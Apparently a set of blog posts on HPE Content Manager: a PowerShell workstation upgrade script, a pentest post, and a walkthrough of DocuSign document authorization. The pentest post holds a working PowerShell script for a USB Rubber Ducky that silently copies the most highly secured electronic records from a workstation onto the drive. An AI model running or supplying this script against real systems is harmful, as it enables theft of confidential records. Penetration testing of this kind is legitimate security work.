Scripting the workstation upgrade

I've been upgrading environments for years via batch files.  I think it's time I ported one of these into a PowerShell script.  Batch files just seem so antiquated.

My batch script is broken down as follows:

  1. Script, Log File, and Machine Preparation
  2. Uninstall old products
  3. Install new product
  4. Clean the workstation and user profiles
  5. Apply any tweaks

Script, Log File, and Machine Preparation

First I need to identify where the logging information from the upgrade should be placed.  In this example I'll place it into the temporary path as defined in the environment variables.  This might not work for me if deploying administratively (retrieving those files requires you know which account executed the script), but it works for my example.

$logDir = Join-Path $env:TEMP "TRIM_Upgrade"
$logFile = Join-Path $logDir "$((get-date).ToString('yyyyMMdd')).log"
if ( -not (Test-Path $logFile) )
{
    # Out-Null suppresses the item object New-Item emits to the pipeline
    New-Item -ItemType File -Force -Path $logFile | Out-Null
    Write-Host "Created Log File: $($logFile)"
} else {
    Write-Host "Log File Already Existed: $($logFile)"
}
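The block above creates the file, but nothing writes to it yet.  One simple way to capture the script's output into that file is Start-Transcript.  A sketch, assuming the same path convention as above (the fallback to [IO.Path]::GetTempPath() is only there to keep the sketch self-contained):

```powershell
# Same log path convention as above; fall back if $env:TEMP is not set
$tempRoot = if ($env:TEMP) { $env:TEMP } else { [IO.Path]::GetTempPath() }
$logDir = Join-Path $tempRoot "TRIM_Upgrade"
$logFile = Join-Path $logDir "$((Get-Date).ToString('yyyyMMdd')).log"
New-Item -ItemType File -Force -Path $logFile | Out-Null

# Everything written to the host between these two calls lands in the log
Start-Transcript -Path $logFile -Append | Out-Null
Write-Host "Upgrade started"
Stop-Transcript | Out-Null
```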

Uninstall old products

Most products can be uninstalled by executing "msiexec /X{<GUID>}", where <GUID> is the product code of the application.  These are super easy to find in the registry (under the Uninstall keys) when inspecting the environment to be upgraded.  With those in hand I can sequence their removal by manually invoking the command whilst supplying the GUID.  Obviously an important thing to consider is how to react when one of the products is missing (msiexec returns 1605 for an unknown product -- is that an upgrade failure?), but one easy way to accomplish this is shown below.

$uninstalls = @( 'D8B2D69F-7FA0-4BC8-8E31-C675162229D1', 'B480C3B2-9432-41B9-BD4A-421A4A6AB4C6', '112268A9-B0FB-421C-BEDB-A08B32E84207' )
foreach ( $uninstall in $uninstalls ) 
{
    $exitCode = (Start-Process -FilePath "msiexec.exe" -ArgumentList "/X{$($uninstall)} /passive /norestart" -Wait -Passthru).ExitCode
    # 0 = success; 3010 = success, restart required; 1605 = product not installed
    if ( $exitCode -eq 0 -or $exitCode -eq 3010 ) {
        Write-Host "Uninstalled: $($uninstall)"
    } else {
        Write-Host "Not Uninstalled ($($exitCode)): $($uninstall)"
    }
}

Install new product

To install the new version we need to execute the same command, but with different parameters.  One parameter will be the source installer, another will be where to log MSIEXEC output, and the rest will provide values to necessary fields used by the installer.

$msiFile = 'HPE_CM_x86.msi'
$installerLog = Join-Path $logDir ($msiFile+'.log')
# $args is an automatic variable in PowerShell, so use a different name; note the /i switch for an install
$msiArgs = "/i ""$($msiFile)"" /qb /norestart /l*vx ""$($installerLog)"" INSTALLDIR=""C:\Program Files\Hewlett Packard Enterprise\Content Manager\"" ADDLOCAL=HPTRIM,Client HPTRIMDIR=""C:\HPE Content Manager"" DEFAULTDBNAME=""CM"" DEFAULTDB=""CM"" STARTMENU_NAME=""HPE Content Manager"" TRIM_DSK=""1"" TRIMREF=""TRIM"" PRIMARYURL=""WG1:1137"" SECONDARYURL=""TRIMWG2:1137"" AUTOGG=""1"" WORD_ON=""0"" EXCEL_ON=""0"" POWERPOINT_ON=""0"" PROJECT_ON=""0"" OUTLOOK_ON=""1"" AUTHMECH=""0"""
if ( (Start-Process -FilePath 'msiexec.exe' -ArgumentList $msiArgs -Wait -Passthru).ExitCode -eq 0 ) {
    Write-Host "Installed: $($msiFile)"
} else {
    Write-Host "Installation Failed: $($msiFile)"
}

Don't forget that HPE now releases Content Manager patches using the MSP approach, so after executing this you'd also apply the patches in the same manner.  The same goes for any add-ons.
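Applying an MSP follows the same Start-Process pattern, just with msiexec's /p switch.  A sketch -- the patch file name here is hypothetical, so substitute whatever HPE actually ships:

```powershell
# Hypothetical patch file name -- substitute the actual MSP
$mspFile = 'HPE_CM_x86_Patch1.msp'
$patchLog = "$($mspFile).log"
# /p applies a patch; logging works the same as for the install
$mspArgs = "/p ""$($mspFile)"" /passive /norestart /l*vx ""$($patchLog)"""
if ( Test-Path $mspFile ) {
    if ( (Start-Process -FilePath 'msiexec.exe' -ArgumentList $mspArgs -Wait -Passthru).ExitCode -eq 0 ) {
        Write-Host "Patched: $($mspFile)"
    } else {
        Write-Host "Patch Failed: $($mspFile)"
    }
}
```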

Since this is now in PowerShell, I could actually implement a cmdlet with CmdletBinding such that I remotely perform the installation.  Implementing the script that way means you don't even need to execute it from some central administrative location.  Anyone with access to PowerShell, permission to install software, and remote PSSession access to the target machine can perform an upgrade via the script.  That is something batch files could never do.
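As a sketch of that idea, even a plain Invoke-Command call can push the script at a remote machine over WinRM -- the machine name and script file below are hypothetical placeholders:

```powershell
# Hypothetical target -- replace with the workstation to be upgraded
$target = 'WORKSTATION01'
# Only attempt the remote call when the machine is actually reachable
if ( Test-Connection -ComputerName $target -Count 1 -Quiet -ErrorAction SilentlyContinue ) {
    # Runs the local upgrade script on the remote machine over WinRM
    Invoke-Command -ComputerName $target -FilePath '.\Upgrade-Workstation.ps1'
}
```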

Cleaning up the Workstation

The installation process leaves all kinds of things on the machine.  Some are okay and some are not.  Ultimately the cleanup and tweaking tasks are geared towards ensuring the end-user's experience is desirable (or at least acceptable).  

A prime example is the dreaded lingering, broken application shortcut:

Last icon shown above is a broken link, which uninstall cannot remove

When the uninstall happens from the previous version, it has no capability to go into each user's profile and remove any links they have manually pinned within the operating system.  That includes the desktop, start menu, the task bar, and quick access area of explorer.  Why not remove those as part of the upgrade?

$profiles = (Get-WmiObject Win32_UserProfile | Select-Object LocalPath)
foreach ( $userProfile in $profiles ) 
{
    # $profile is an automatic variable in PowerShell, so use a different name
    $pinnedStartMenu = Join-Path $userProfile.LocalPath "AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\TRIM.lnk"
    if ( Test-Path $pinnedStartMenu ) 
    {
        Remove-Item $pinnedStartMenu -Force
        Write-Host "Removed: $($pinnedStartMenu)"
    }
}

Applying Tweaks

Every piece of software has bugs.  During an upgrade it's important to overcome those bugs by implementing any fixes or tweaks required.  For instance, one of the CM builds searched for the dictionary files in an incorrect spot.  If left unresolved, no one would be able to use the spellchecker.  By handling that issue in the upgrade script, we didn't let the bug impact usage of the product.
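As a sketch of that kind of tweak -- both paths below are hypothetical, since the real locations depend on the affected build -- the fix amounts to copying the dictionary files to where that build actually looks:

```powershell
# Hypothetical paths -- the affected build looked for dictionaries in the wrong spot
$dictSource = 'C:\Program Files\Hewlett Packard Enterprise\Content Manager\Dictionaries'
$dictTarget = 'C:\HPE Content Manager\Dictionaries'
# Copy only when the source exists and the expected location is still empty
if ( (Test-Path $dictSource) -and -not (Test-Path $dictTarget) ) {
    Copy-Item -Path $dictSource -Destination $dictTarget -Recurse -Force
    Write-Host "Copied dictionaries to: $($dictTarget)"
}
```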

Exfiltrating Electronic Documents from Content Manager

I'm loving Powershell more and more!  The capabilities are outstanding and never-ending.  This can be both a blessing and a curse though, as it exposes functionality many administrators would loathe (if only they knew about the risks!).  

For instance, I just wrote a script to use as part of a pentest.  The ultimate goal of this pentest is to exfiltrate documents via a USB Rubber Ducky.  To accomplish that I need a light-weight script tailored to the scenario.

We can break down the script into 5 major pieces of logic:

  1. Setup the script
  2. Connect to CM
  3. Find and process security levels
  4. Find records for the levels
  5. Extract the files

With all this in place I'll create a ducky script to be compiled and placed on my rubber ducky.  Then I can stick that into any workstation where Content Manager has been installed and silently extract as much content as I'd like.  Take a look at the script below!


Setup the script

First things first, I need to import the Content Manager namespace.  I accomplish that by using Add-Type and pointing to the default installation location.  Now that won't work in all environments, but it's sufficient for my pentest.

Second, the USB Rubber Ducky will be inserted into the computer and then assigned a drive letter by Windows.  I won't know the drive letter, but I need it!  So I use Get-Location to retrieve the drive letter and then tack on an "r" to represent where I want my records to be placed.

Lastly, I fetch the current amount of free space on the MicroSD card I'll insert into the ducky.  My current hardware is limited to an 8 GB SD card, but after each exfiltration I'll swap out the card.  In case I don't, I don't want errors caused by a hardcoded maximum amount to extract.  I also prepare a variable to track how much space I've extracted.

Add-Type -Path "C:\Program Files\Hewlett Packard Enterprise\Content Manager\HP.HPTRIM.SDK.dll"
$rootDrive = (get-location).Drive.Name
$rootPath = "$($rootDrive):\r"
$maxVolume = Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='$($rootDrive):'" | Foreach-Object {$_.FreeSpace}
$curVolume = [long]0

Connect to CM

I don't really need much code for this task, but I'm considering it to be a distinct task in my pentest.  That's because I may want to expand upon the logic.  I envision dynamically determining the various datasets available on the workstation and then repeating the extraction for each dataset (or possibly doing some reconnaissance and then inserting server names or dataset IDs).

$db = New-Object HP.HPTRIM.SDK.Database

Find and process security levels

There's not really much of a reason to exfiltrate public electronic records, right?  So I want to ensure that I'm focusing on the secured stuff first.  To do that I need to search for all the available levels and then process them in reverse order. 

$levels = New-Object HP.HPTRIM.SDK.TrimMainObjectSearch -ArgumentList $db, SecurityLevel
$levels.SearchString = "all"
$levels.SetSortString("levelNumber-")
foreach ( $level in $levels ) 
{
    #insert record logic here
    if ( [long]$curVolume -ge [long]$maxVolume ) 
    {
        break;
    }
}

Find and process records

At this point in the script I've got everything I need to search for records, so I just need to craft the search string and execute it.  This block slots into the loop above, where the placeholder comment sits.  Then I can process each record!

    $recs = New-Object HP.HPTRIM.SDK.TrimMainObjectSearch -ArgumentList $db, Record
    $searchString = "securityLevel:$($level.LevelNumber) electronic"
    $recs.SearchString = $searchString
    $recs.SetSortString('createdOn-')
    foreach ( $result in $recs ) 
    {
        $rec = [HP.HPTRIM.SDK.Record]$result
        [long]$curVolume += [long]$rec.DocumentSize
        if ( [long]$curVolume -lt [long]$maxVolume ) 
        {
            $sp = Join-Path $rootPath $rec.SuggestedFileName
            $rec.GetDocument($sp)
        } else {
            break;
        }
    }

Authorizing Documents via DocuSign

There's a pretty nifty new feature in Content Manager: the Document Review process.  This process includes an authorization feature that supports DocuSign.  You can use a simpler process, but I'm focusing on DocuSign at the moment.  With DocuSign you get those cool "sign here" spots in a document (like what my accountant might send me).

Once signed (or Authorized in the CM terminology), the signed copy can become your final record.  Very cool!  

Starting the Authorization (Signing) Process

As a normal end-user I create a new record of type "Policy Document".  Then I right-click on it and select Document Review->Start Authorization.

In the real world I would have probably done a lot more before getting to this point.  Imagine numerous revisions, actions, meta-data fields, etc.  For simplicity I'm just skipping all of that.  I want this Word document to be signed, and that's it.

When I Start Authorization, the Content Manager rendering service will hand-off the electronic document for processing.  Once it's been handed off, DocuSign emails the responsible location.  

I clicked the link and then signed the document.

The Content Manager rendering service will routinely check (every 30 minutes by default) for updates to the status of pending requests.  After the update is processed I should be able to see a new rendition on my original record.  The screenshot below shows what that would look like.

Success!  Signed rendition via DocuSign

Technically the process isn't done yet.  The authorization has been received and now it's time to finalize the record.  It's an opportunity to update the notes, locations, meta-data, or access controls for the record.  The menu options reflect this state:

Menu options available at last stage of the process

After selecting the Finalize Document feature (not to be confused with the Finalize option under the electronic menu!!) for Document Review, I'm asked to decide how to handle the record.  I'm disappointed that the promotion option is not checked by default, but I can easily check it.  

Once I click OK, all users can now see the digitally signed copy as the final revision.

Appearance of the final record within Content Manager

This has been a very straight-forward process in terms of setup and configuration.  I can see tons of possible uses.  It's entirely possible to have external parties digitally sign records without them ever knowing Content Manager is in use.  You can also set up templates for your processes, signature spots, and comment sections.

 

Configuration of Content Manager

I created one record type named "Policy Document".  I used all of the default settings for the record type, except for the document review tab.  There I checked the authorization required checkbox, specified "Policy Manager" as the responsible location, selected DocuSign as my process, and set 2 days as my authorization reminder duration.

The Policy Manager is a location with a name, login name and email address:

Dataset Rendering Configuration

I set up my Render service configuration to reflect my DocuSign account details.  The help file directs you to use "docusign.com", but since I'm using a demo account I couldn't use that.  I got HTTP 301 errors when I tried it.  To figure it out I went to the DocuSign REST API Explorer (https://apiexplorer.docusign.com), looked at the URL it worked with, and plugged that into the configuration.  Screenshot below:

Rendering Service Configuration

As you can also see, I lowered my polling interval from 1800 seconds (30 minutes) to 30 seconds.  Be careful with that though, as your terms of service with DocuSign are important to adhere to.  Don't get locked out! :)